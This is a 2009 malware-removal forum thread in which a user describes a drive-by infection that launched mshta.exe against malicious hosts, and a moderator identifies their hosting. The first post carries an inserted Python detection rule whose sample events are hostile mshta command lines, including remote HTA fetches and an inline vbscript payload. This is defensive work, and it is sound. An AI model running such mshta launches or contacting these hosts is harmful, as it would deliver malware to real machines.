Malwarebytes

uploaded infected.tar.gz


#1
duaneduane

    New Member

Yesterday, while visiting sites from reddit.com using FF, Java took off and acted funny. Then IE popped up, and, doh, I think the vector is via Java.

Malwarebytes seemed to remove the problem, but re-infection appears to be happening.

I just uploaded (a) a HijackThis log and (b) copies of odd files that appear to be part of the infection. See the file "infected.tar.gz".

Then I started to write this, and the virus has created new files... grrr....


I am a developer type, so I'll try to tell you some more.
Perhaps this is useful, or perhaps it will send you on a wild goose chase.

==========================================

I suspect the attack vector is JAVA, because Java unexpectedly ran before the initial infection.

==========================================

Last night the virus program launched mshta.exe, pointing at these HTTP sites:

sixty-six DOT forty-eight DOT seventy-eight DOT two-two-two /ron/ronz.php?sid=&numpop=2&nid=1165670410&mid=8683822694&servern=

URL above is munged: spelled-out numbers; the DOTs are obvious.

And:

Runs program: mshta.exe with command line argument:

Letter-S, Letter-R, Letter-V, DOT, Letter-F, hyphen, Letter-O, hyphen, Letter-R, DOT, ms, SLASH code SLASH srun

URL above is munged: spelled-out server address, then /code/srun.

And

klite DOT Letter-A, Letter-T, Letter-H DOT Letter-C, Letter-X

Again "munged": spelled-out middle word plus DOT.

================================


-Duane.
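The mshta.exe launches described in the post above are exactly what a process-creation rule can catch: mshta handed an http:// URL, a scheme-less host/path like srv.f-o-r.ms/code/srun, or inline script, and spawned from a browser or plugin host such as java.exe rather than from an installer. The following is an added example (not code from the original thread or from Malwarebytes); it assumes a simplified `parent|image|command_line` log line format, which is an assumption and not any real product's schema, and its sample lines are constructed, reusing only the hostnames quoted in the thread and a TEST-NET address in place of the IP. It also collects the contacted hosts so they can be looked up or blocked, which is what the later hosts-file.net lookups in this thread do by hand.

```python
"""Flag mshta.exe launches that fetch remote HTA content or run inline script.

Added example, not from the original thread. Assumes a simplified
'parent_image|image|command_line' log line format (an assumption, not a
real product's schema). Sample events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample events. Hostnames are the ones quoted in the thread;
# 192.0.2.10 (TEST-NET) stands in for the poster's spelled-out IP address.
SAMPLE_EVENTS = [
    "java.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe http://192.0.2.10/ron/ronz.php?sid=&numpop=2",
    "java.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe srv.f-o-r.ms/code/srun",
    "java.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe http://klite.ath.cx/",
    "explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe vbscript:CreateObject(\"WScript.Shell\").Run(\"calc\")",
    "explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe \"C:\\Program Files\\Vendor\\wizard.hta\"",
    "explorer.exe|C:\\Program Files\\Mozilla Firefox\\firefox.exe|firefox.exe https://www.reddit.com/",
]

# Parents that indicate a drive-by chain (browser or browser plugin host).
BROWSER_OR_PLUGIN_PARENTS = {"java.exe", "javaw.exe", "firefox.exe", "iexplore.exe"}

URL_RE = re.compile(r"(?i)^(?:https?|ftp)://(?P<host>[^/\s:?#]+)")
# Scheme-less host with at least one dot, followed by a path: srv.f-o-r.ms/code/srun
BARE_HOST_PATH_RE = re.compile(r"(?i)^(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)+)/")
INLINE_SCRIPT_RE = re.compile(r"(?i)^(?:vbscript|javascript):")


@dataclass
class Finding:
    parent: str
    reason: str
    host: Optional[str]
    from_browser_chain: bool
    command_line: str


def split_args(command_line: str) -> List[str]:
    """Split on whitespace, honouring double-quoted tokens, and drop argv[0]."""
    tokens = re.findall(r'"([^"]*)"|(\S+)', command_line)
    return [quoted or bare for quoted, bare in tokens][1:]


def classify_arg(arg: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (reason, host) when the argument points mshta at remote or inline
    content; None for a local file path, which is how legitimate HTA wizards run."""
    if "\\" in arg or re.match(r"^[A-Za-z]:", arg):
        return None
    m = URL_RE.match(arg)
    if m:
        return "remote HTA via URL", m.group("host")
    m = BARE_HOST_PATH_RE.match(arg)
    if m:
        return "remote HTA via scheme-less host/path", m.group("host")
    if INLINE_SCRIPT_RE.match(arg):
        return "inline script passed to mshta", None
    return None


def analyze(lines: List[str]) -> List[Finding]:
    """Run the mshta rule over 'parent|image|command_line' lines."""
    findings = []
    for line in lines:
        parent, image, cmd = line.split("|", 2)
        if image.rsplit("\\", 1)[-1].lower() != "mshta.exe":
            continue
        for arg in split_args(cmd):
            hit = classify_arg(arg)
            if hit:
                reason, host = hit
                findings.append(Finding(parent, reason, host,
                                        parent.lower() in BROWSER_OR_PLUGIN_PARENTS, cmd))
                break  # one finding per event is enough
    return findings


def contacted_hosts(findings: List[Finding]) -> List[str]:
    """Unique hosts the flagged mshta launches reached out to, for lookup/blocking."""
    return sorted({f.host for f in findings if f.host})


if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for f in hits:
        chain = " [browser/plugin parent]" if f.from_browser_chain else ""
        print(f"{f.parent} -> mshta.exe: {f.reason}{chain}: {f.command_line}")
    print("hosts to look up / block:", ", ".join(contacted_hosts(hits)))
```

The local-path case is deliberately left unflagged so the rule does not fire on every vendor HTA wizard; the parent-process flag is what separates the post's java.exe-spawned launches from a user double-clicking an installer.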

#2
duaneduane

    New Member

I should perhaps note that Malwarebytes is *NOT* detecting these files....

-Duane.

#3
duaneduane

    New Member

More files that are being missed... just uploaded.

-Duane.

#4
MysteryFCM

    Forum Deity

  • Moderators
  • Location: Tyneside, UK

duaneduane, on May 4 2009, 01:08 AM, said:

sixty-six DOT forty-eight DOT seventy-eight DOT two-two-two /ron/ronz.php?sid=&numpop=2&nid=1165670410&mid=8683822694&servern=

This is Verizon Business / MCI Communications Services;

http://hosts-file.net/?s=66.48.72.222

duaneduane, on May 4 2009, 01:08 AM, said:

And:

Runs program: mshta.exe with command line argument:

Letter-S, Letter-R, Letter-V, DOT, Letter-F, hyphen, Letter-O, hyphen, Letter-R, DOT, ms, SLASH code SLASH srun

Hosted (surprise surprise) by Leaseweb (known to be crimeware friendly)

http://hosts-file.net/?s=85.17.162.100
http://hosts-file.net/?s=srv.f-o-r.ms

duaneduane, on May 4 2009, 01:08 AM, said:

And

klite DOT Letter-A, Letter-T, Letter-H DOT Letter-C, Letter-X

Also hosted at LeaseWeb

http://hosts-file.net/?s=klite.ath.cx

Steven Burn
Research Engineer